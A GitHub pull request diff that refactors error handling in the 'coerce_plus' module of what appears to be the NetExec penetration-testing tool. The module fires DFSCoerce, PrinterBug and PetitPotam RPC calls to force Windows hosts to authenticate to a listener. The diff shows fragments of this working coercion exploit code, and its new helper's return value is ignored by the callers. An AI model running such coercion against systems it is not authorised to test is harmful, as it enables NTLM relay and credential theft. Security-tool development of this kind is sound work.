Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Small fixes for coerce_plus #442

Merged
merged 4 commits into from
Oct 10, 2024
Merged

Small fixes for coerce_plus #442

Changes from all commits
Commits
Show all changes
4 commits
Select commit Hold shift + click to select a range
a7141ae
Improve handling of rpc errors for dfscoerce
NeffIsBack Oct 10, 2024
b81ea6c
Simplify code
NeffIsBack Oct 10, 2024
3ce7b6b
Readd rpc message to success message
NeffIsBack Oct 10, 2024
83a16b6
Fix PrinterBug detection
NeffIsBack Oct 10, 2024
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
79 changes: 20 additions & 59 deletions nxc/modules/coerce_plus.py
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -389,15 +389,7 @@ def exploit(self, dce, listener, always_continue, pipe):

dce.request(request)
except Exception as e:
if str(e).find("rpc_s_access_denied") >= 0 or str(e).find("ERROR_BAD_NETPATH") >= 0 or str(e).find("RPC_S_INVALID_NET_ADDR") >= 0:
self.context.log.debug("NetrDfsAddStdRootForced Success")
self.context.log.highlight(f"Exploit Success, {pipe}\\NetrDfsAddStdRootForced")
if not always_continue:
return True
elif str(e).find("ERROR_NOT_SUPPORTED") >= 0:
self.context.log.debug("Not Vulnerable")
else:
self.context.log.debug(f"Something went wrong, check error status => {e!s}")
self.handle_exception(request.__class__.__name__, always_continue, pipe, e)

self.context.log.debug("Sending NetrDfsAddRootTarget!")
try:
Expand All @@ -421,15 +413,7 @@ def exploit(self, dce, listener, always_continue, pipe):
self.context.log.debug("NetrDfsAddRootTarget Success")
return True
except Exception as e:
if str(e).find("rpc_s_access_denied") >= 0 or str(e).find("ERROR_BAD_NETPATH") >= 0 or str(e).find("RPC_S_INVALID_NET_ADDR") >= 0:
self.context.log.debug("NetrDfsAddRootTarget Success")
self.context.log.highlight(f"Exploit Success, {pipe}\\NetrDfsAddRootTarget")
if not always_continue:
return True
elif str(e).find("ERROR_NOT_SUPPORTED") >= 0:
self.context.log.debug("Not Vulnerable")
else:
self.context.log.debug(f"Something went wrong, check error status => {e!s}")
self.handle_exception(request.__class__.__name__, always_continue, pipe, e)

# Private exploit
self.context.log.debug("Sending NetrDfsRemoveRootTarget!")
Expand All @@ -448,13 +432,7 @@ def exploit(self, dce, listener, always_continue, pipe):
self.context.log.debug("NetrDfsRemoveRootTarget Success")
return True
except Exception as e:
if str(e).find("rpc_s_access_denied") >= 0 or str(e).find("ERROR_BAD_NETPATH") >= 0 or str(e).find("RPC_S_INVALID_NET_ADDR") >= 0:
self.context.log.debug("NetrDfsRemoveRootTarget Success")
self.context.log.highlight(f"Exploit Success, {pipe}\\NetrDfsRemoveRootTarget")
if not always_continue:
return True
else:
self.context.log.debug(f"Something went wrong, check error status => {e!s}")
self.handle_exception(request.__class__.__name__, always_continue, pipe, e)

self.context.log.debug("Sending NetrDfsManagerInitialize!")
try:
Expand All @@ -469,15 +447,7 @@ def exploit(self, dce, listener, always_continue, pipe):

dce.request(request)
except Exception as e:
if str(e).find("rpc_s_access_denied") >= 0 or str(e).find("ERROR_BAD_NETPATH") >= 0 or str(e).find("RPC_S_INVALID_NET_ADDR") >= 0:
self.context.log.debug("NetrDfsAdd Success")
self.context.log.highlight(f"Exploit Success, {pipe}\\NetrDfsAdd")
if not always_continue:
return True
elif str(e).find("ERROR_NOT_SUPPORTED") >= 0:
self.context.log.debug("Not Vulnerable")
else:
self.context.log.debug(f"Something went wrong, check error status => {e!s}")
self.handle_exception(request.__class__.__name__, always_continue, pipe, e)

self.context.log.debug("Sending NetrDfsManagerInitialize!")
try:
Expand All @@ -492,15 +462,7 @@ def exploit(self, dce, listener, always_continue, pipe):

dce.request(request)
except Exception as e:
if str(e).find("rpc_s_access_denied") >= 0 or str(e).find("ERROR_BAD_NETPATH") >= 0 or str(e).find("RPC_S_INVALID_NET_ADDR") >= 0:
self.context.log.debug("NetrDfsAdd Success")
self.context.log.highlight(f"Exploit Success, {pipe}\\NetrDfsAdd")
if not always_continue:
return True
elif str(e).find("ERROR_NOT_SUPPORTED") >= 0:
self.context.log.debug("Not Vulnerable")
else:
self.context.log.highlight(f"Something went wrong, check error status => {e!s}")
self.handle_exception(request.__class__.__name__, always_continue, pipe, e)

self.context.log.debug("Sending NetrDfsAddStdRoot!")
try:
Expand All @@ -511,13 +473,7 @@ def exploit(self, dce, listener, always_continue, pipe):
request["ApiFlags"] = 0
dce.request(request)
except Exception as e:
if str(e).find("rpc_s_access_denied") >= 0 or str(e).find("ERROR_BAD_NETPATH") >= 0 or str(e).find("RPC_S_INVALID_NET_ADDR") >= 0:
self.context.log.debug("NetrDfsAddStdRoot Success")
self.context.log.highlight(f"Exploit Success, {pipe}\\NetrDfsAddStdRoot")
if not always_continue:
return True
else:
self.context.log.debug(f"Something went wrong, check error status => {e!s}")
self.handle_exception(request.__class__.__name__, always_continue, pipe, e)

self.context.log.debug("Sending NetrDfsRemoveStdRoot!")
try:
Expand All @@ -527,13 +483,18 @@ def exploit(self, dce, listener, always_continue, pipe):
request["ApiFlags"] = 0
dce.request(request)
except Exception as e:
if str(e).find("rpc_s_access_denied") >= 0 or str(e).find("ERROR_BAD_NETPATH") >= 0 or str(e).find("RPC_S_INVALID_NET_ADDR") >= 0:
self.context.log.debug("NetrDfsRemoveStdRoot Success")
self.context.log.highlight(f"Exploit Success, {pipe}\\NetrDfsRemoveStdRoot")
if not always_continue:
return True
else:
self.context.log.debug(f"Something went wrong, check error status => {e!s}")
self.handle_exception(request.__class__.__name__, always_continue, pipe, e)

def handle_exception(self, method_name, always_continue, pipe, e):
if str(e).find("rpc_s_access_denied") >= 0 or str(e).find("ERROR_BAD_NETPATH") >= 0 or str(e).find("RPC_S_INVALID_NET_ADDR") >= 0:
self.context.log.debug(f"{method_name} Success")
self.context.log.highlight(f"Exploit Success, {pipe}\\{method_name}")
if not always_continue:
return True
elif str(e).find("ERROR_NOT_SUPPORTED") >= 0:
self.context.log.debug("Not Vulnerable")
else:
self.context.log.debug(f"Something went wrong, check error status => {e!s}")


class PetitPotamtTrigger:
Expand Down Expand Up @@ -868,7 +829,7 @@ def exploit(self, dce, listener, target, always_continue, pipe):

self.context.log.debug("Sending RpcRemoteFindFirstPrinterChangeNotification!")
try:
resp = rprn.hRpcOpenPrinter(dce, "\\\\%s\x00" % target)
resp = rprn.hRpcOpenPrinter(dce, f"\\\\{target}\x00")
except Exception as e:
if str(e).find("Broken pipe") >= 0:
# The connection timed-out. Let's try to bring it back next round
Expand All @@ -892,7 +853,7 @@ def exploit(self, dce, listener, target, always_continue, pipe):
request["pBuffer"] = NULL
dce.request(request)
except Exception as e:
if str(e).find("rpc_s_access_denied") >= 0:
if str(e).find("rpc_s_access_denied") >= 0 or str(e).find("RPC_S_SERVER_UNAVAILABLE") >= 0:
self.context.log.debug("RpcRemoteFindFirstPrinterChangeNotification Success")
self.context.log.highlight(f"Exploit Success, {pipe}\\RpcRemoteFindFirstPrinterChangeNotification")
if not always_continue:
Expand Down